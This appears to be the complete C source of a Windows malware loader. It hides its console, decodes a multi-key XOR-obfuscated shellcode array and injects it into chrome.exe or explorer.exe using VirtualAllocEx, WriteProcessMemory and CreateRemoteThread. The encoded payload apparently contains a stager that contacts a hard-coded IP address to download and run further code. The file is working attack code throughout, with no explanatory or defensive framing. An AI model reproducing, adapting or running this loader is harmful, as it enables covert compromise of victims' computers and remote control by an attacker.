
#include <windows.h>
#include <stdio.h>
#include "connector.h"
//coded by orca666

int main(int argc, char* argv[]) {
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_MINIMIZE);
    ShowWindow(hWnd, SW_HIDE);
     

    unsigned char shellcode[] = "\xb9\xd\xc6\xa1\xb5\xad\x8d\x45\x45\x45\x4\x14\x4\x15\x17\x14\x13\xd\x74\x97\x20\xd\xce\x17\x25\xd\xce\x17\x5d\xd\xce\x17\x65\xd\xce\x37\x15\xd\x4a\xf2\xf\xf\x8\x74\x8c\xd\x74\x85\xe9\x79\x24\x39\x47\x69\x65\x4\x84\x8c\x48\x4\x44\x84\xa7\xa8\x17\x4\x14\xd\xce\x17\x65\xce\x7\x79\xd\x44\x95\x23\xc4\x3d\x5d\x4e\x47\x30\x37\xce\xc5\xcd\x45\x45\x45\xd\xc0\x85\x31\x22\xd\x44\x95\x15\xce\xd\x5d\x1\xce\x5\x65\xc\x44\x95\xa6\x13\xd\xba\x8c\x4\xce\x71\xcd\xd\x44\x93\x8\x74\x8c\xd\x74\x85\xe9\x4\x84\x8c\x48\x4\x44\x84\x7d\xa5\x30\xb4\x9\x46\x9\x61\x4d\x0\x7c\x94\x30\x9d\x1d\x1\xce\x5\x61\xc\x44\x95\x23\x4\xce\x49\xd\x1\xce\x5\x59\xc\x44\x95\x4\xce\x41\xcd\xd\x44\x95\x4\x1d\x4\x1d\x1b\x1c\x1f\x4\x1d\x4\x1c\x4\x1f\xd\xc6\xa9\x65\x4\x17\xba\xa5\x1d\x4\x1c\x1f\xd\xce\x57\xac\xa\xba\xba\xba\x18\x2f\x45\xc\xfb\x32\x2c\x2b\x2c\x2b\x20\x31\x45\x4\x13\xc\xcc\xa3\x9\xcc\xb4\x4\xff\x9\x32\x63\x42\xba\x90\xd\x74\x8c\xd\x74\x97\x8\x74\x85\x8\x74\x8c\x4\x15\x4\x15\x4\xff\x7f\x13\x3c\xe2\xba\x90\xae\x36\x1f\xd\xcc\x84\x4\xfd\xc2\x40\x45\x45\x8\x74\x8c\x4\x14\x4\x14\x2f\x46\x4\x14\x4\xff\x12\xcc\xda\x83\xba\x90\xae\x1c\x1e\xd\xcc\x84\xd\x74\x97\xc\xcc\x9d\x8\x74\x8c\x17\x2d\x45\x47\x5\xc1\x17\x17\x4\xff\xae\x10\x6b\x7e\xba\x90\xd\xcc\x83\xd\xc6\x86\x15\x2f\x4f\x1a\xd\xcc\xb4\xd\xcc\x9f\xc\x82\x85\xba\xba\xba\xba\x8\x74\x8c\x17\x17\x4\xff\x68\x43\x5d\x3e\xba\x90\xc0\x85\x4a\xc0\xd8\x44\x45\x45\xd\xba\x8a\x4a\xc1\xc9\x44\x45\x45\xae\x96\xac\xa1\x44\x45\x45\xad\xe7\xba\xba\xba\x6a\x14\xb\xa\x2a\x45\x3c\xc3\xce\x18\xfc\xd2\x20\x29\x90\xbd\x68\x7a\xf7\x62\x78\x42\xa1\x89\x23\xfc\xcb\xb4\x60\x8c\xc0\x2\xf8\x3d\x4c\xa8\xae\x8f\xcf\xa0\xe6\x1\xe5\x83\x34\xc1\x1a\x5e\x5e\x57\xd2\xa4\xbc\x55\xf9\xd3\x69\xa4\xd6\xf9\xca\xb5\x72\x80\xa6\x71\xa4\xa6\x20\x0\x17\xa5\x60\xff\x3d\x3a\xc2\xf7\x35\x45\x10\x36\x20\x37\x68\x4\x22\x20\x2b\x31\x7f\x65\x8\x2a\x3f\x2c\x29\x29\x24\x6a\x70\x6b\x75\x65\x6d\x12\x2c\x2b\x21\x2a\x32\x36\x65\xb\x11\x65\x73\x6b\x74\x7e\x65\x11\x37\x2c\x21\x20\x2b\x31\x6a\x72\x6b\x75\x7e\x65\x37\x33\x7f\x74\x74\x6b\x75\x6c\x65\x29\x2c\x2e\x20\x65\x2\x20\x26\x2e\x2a\x48\x4f\x45\x2f\x27\x59\xe5\x47\xec\xec\x22\xd2\xd0\x12\x33\x87\x9a\x8f\x9\xc5\x7f\xcd\x11\xf4\xa1\x79\xd6\x30\xf3\x15\x5e\x7\xee\x4c\xdc\x79\x4\x20\x16\x68\xe4\x9\xbc\xd0\xb3\x39\xfa\xd6\x5c\x92\x60\xab\x4\x29\xce\xf0\x59\x8c\x67\xee\xdb\xc2\x49\x71\xd\xd1\xbb\x69\x16\x6c\xc7\xc3\x5f\x40\x66\x71\x13\x4b\x1a\x35\x28\x16\x55\x33\x64\x46\x6e\x39\xc1\x49\x94\x6e\xa7\x68\x21\x50\x98\xd\x4e\x63\x4\xcb\x48\xda\x3a\x20\x90\xe5\x33\x1b\x1d\x70\x7d\x87\x39\xc1\x2d\x13\xc5\x69\xdd\xc9\xd5\xed\xea\xc3\x7\x58\x6\x85\x95\x87\x87\x3c\x55\xec\x83\x20\x38\x1b\xa6\x4c\x1a\x4a\x35\xc\x83\x44\x98\x50\x4d\x3d\xe1\x8b\x9c\x95\xc0\x1b\x68\x6\x83\x13\x90\x90\x9a\xbb\x38\x5a\x18\x83\x9e\x85\x3b\x23\xde\xd6\xbd\x84\x89\x8e\xcb\x52\xde\xb4\x22\x38\x5a\x1\xd5\x75\xdd\x2e\x52\xfe\xa6\xb7\xe8\x3d\xff\x7c\x10\x5d\xe\x44\x1b\x54\xf3\xf1\xb4\x39\xc\x1d\x4c\xc1\x97\x63\x4e\x80\x84\xf\x23\xe0\x19\xdb\x88\xb5\xf7\x68\x14\x98\x45\x4\xfb\xb5\xf0\xe7\x13\xba\x90\xd\x74\x8c\xff\x45\x45\x5\x45\x4\xfd\x45\x55\x45\x45\x4\xfc\x5\x45\x45\x45\x4\xff\x1d\xe1\x16\xa0\xba\x90\xd\xd6\x16\x16\xd\xcc\xa2\xd\xcc\xb4\xd\xcc\x9f\x4\xfd\x45\x65\x45\x45\xc\xcc\xbc\x4\xff\x57\xd3\xcc\xa7\xba\x90\xd\xc6\x81\x65\xc0\x85\x31\xf3\x23\xce\x42\xd\x44\x86\xc0\x85\x30\x92\x1d\x1d\x1d\xd\x40\x45\x45\x45\x45\x15\x86\xad\xda\xb8\xba\xba\x74\x7c\x77\x6b\x74\x73\x7d\x6b\x74\x73\x6b\x74\x75\x7d\x45\x5c\x2c\xe5\xc8";

    bool chrome = true;
    int process_id = find2();

    if (process_id > 0 && process_id != -1 && process_id != NULL)
    {
        printf("chrome.exe pid was found : %d .... \n", process_id);
    }

    else {
        printf("chrome process is not open \ninjecting to explorer.exe instead...\n");
        chrome = false;
    }



    int process_id2;

    HANDLE process;
    if (chrome == true) {
        printf("injecting to chrome.exe\n");
        process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);

    }
    else {
        process_id2 = find();
        printf("explorer.exe pid was found : %d .... \n", process_id2);
        process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id2);
    }



    LPVOID base_address;

    if (process) {
        printf("process is opened, continuing ... \n");
        base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (base_address) {
            printf("based address is 0x%p\n", base_address);

            int n = 0;


            for (int i = 0; i <= sizeof(shellcode); i++) {
                // since in encoder.py it was : ^ 0x11) ^ 0x52 ) ^ 0xc7) ^ 0xa3) ^ 0xd8) ^ 0x05) ^ 0x32) ^ 0xf7) ^ 0x7a)
                // thus it is  ^ 0x7a ^ 0xf7 ^ 0x32 ^ 0x05 ^ 0xd8 ^ 0xa3 ^ 0xc7 ^ 0x52 ^ 0x11
                char DecodedOpCode = shellcode[i] ^ 0x7a ^ 0xf7 ^ 0x32 ^ 0x05 ^ 0xd8 ^ 0xa3 ^ 0xc7 ^ 0x52 ^ 0x11;
                if (WriteProcessMemory(process, LPVOID((ULONG_PTR)base_address + n), &DecodedOpCode, 1, NULL)) {
                    n++;
                }

            }
            DWORD threadId = 0;
            printf("Running the thread ...\n");
            HANDLE thread = CreateRemoteThread(process, NULL, 100, (LPTHREAD_START_ROUTINE)base_address, NULL, NULL, &threadId);
            WaitForSingleObject(thread, INFINITE);
            printf("The thread finished!\n");
        }
        else {
            printf("Unable to allocate memory ... \n");
        }
    }
    else {
        printf("Enable to retrieve process handle ...\n");
    }
}
